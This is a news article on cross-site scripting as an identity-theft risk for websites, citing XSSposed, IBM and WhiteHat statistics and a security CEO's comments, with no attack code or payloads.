Website cross-site scripting creates identity theft danger

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someonePrint this page

By Rodi­ka Tollef­son. ThirdCertainty

While many com­pa­nies focus their efforts on pre­vent­ing major breach­es, cyber crim­i­nals are tak­ing advan­tage of the low­er-hang­ing fruit, like cross-site script­ing (XSS).

Despite a decline in XSS activ­i­ty in the past cou­ple of years, a large num­ber of sites — even major ones like Ama­zon, Google and Face­book — have been found vulnerable.

More: 3 steps for fig­ur­ing out if your busi­ness is secure

 Amazon.com’s most recent vul­ner­a­bil­i­ty was report­ed on March 21 to the pub­lic archive XXS­posed and was not patched for two days, putting both web­site users and admin­is­tra­tors at risk of being compromised.

Cross-site script­ing is a vul­ner­a­bil­i­ty found in web appli­ca­tions that allows hack­ers to inject a web­site script that will exe­cute on the user’s browser.

This could allow bad actors to do any­thing from steal­ing per­son­al infor­ma­tion and access­ing sen­si­tive data to tak­ing com­plete con­trol over a machine through a dri­ve-by-down­load attack.

Almost every large web­site is vul­ner­a­ble to XSS,” says Ilia Kolochenko, CEO of High-Tech Bridge, a cyber­se­cu­ri­ty com­pa­ny focused on breach pre­ven­tion through auto­mat­ed and man­u­al pen­e­tra­tion testing.

In 2004, when XSS first start­ed to appear, the main and basi­cal­ly sole vec­tor was steal­ing cook­ies while now it’s more about sophis­ti­cat­ed phish­ing and dri­ve-by down­load,” Kolochenko says.

Since its incep­tion in June 2014, XSS­posed had more than 8,900 report­ed vul­ner­a­bil­i­ties, and few­er than 1,300 of those were fixed. Its list includes more than 1,500 VIP web­sites, includ­ing sites like noaa.gov, weather.com and espn.go.com that still have unpatched vulnerabilities.

In a research and intel­li­gence report about XSS pub­lished last Decem­ber, IBM said that of the more than 900 dynam­ic Web appli­ca­tion scans, 17 per­cent were found vul­ner­a­ble by its team.

While this may not sound like a very high per­cent­age, take into account that this data sam­ple comes from orga­ni­za­tions that have extreme­ly mature and estab­lished secu­ri­ty prac­tices,” ana­lyst Niki­ta Gup­ta wrote in the report.

For cyber­crim­i­nals, vul­ner­a­ble web­sites are attrac­tive regard­less of size, loca­tion or type of busi­ness, accord­ing to High-Tech Bridge.

High-pro­file ones could fetch as much as $1,000 on the black mar­ket, the com­pa­ny said. And while small­er ones may only cost $1, they’re much eas­i­er to com­pro­mise — mak­ing them just as attractive.

A White Hat Secu­ri­ty 2014 Web­site Sta­tis­tics Secu­ri­ty Report showed that cross-site script­ing was the most-com­mon vul­ner­a­bil­i­ty in six of five pro­gram­ming languages.

Kolochenko said he expects to see the trends con­tin­ue because detec­tion of some sub­types of XSS is com­pli­cat­ed and auto­mat­ed detec­tion can’t detect all XSS.

He notes that a recent report by mar­ket research and con­sult­ing com­pa­ny Frost & Sul­li­van shows an increase in hybrid (auto­mat­ed and man­u­al) test­ing of Web applications.

The report says that while busi­ness­es “con­tin­ue to under­es­ti­mate the risk asso­ci­at­ed with unpro­tect­ed Web appli­ca­tions,” hack­ers are increas­ing­ly rely­ing on auto­mat­ed meth­ods “to tar­get a broad set of victims.”

Kolochenko notes, “The XSS vul­ner­a­bil­i­ty dis­cov­ered on Amazon.com is just anoth­er con­fir­ma­tion that auto­mat­ed scan­ning tools and solu­tions are not enough to assume con­tin­u­ous web­site security.”

More on emerg­ing best practices
5 data pro­tec­tion tips for SMBs
What SMBs need to know about CISOs
Pro­tect­ing your dig­i­tal foot­print in the post pri­va­cy era

 


Posted in Identity Theft, News & Analysis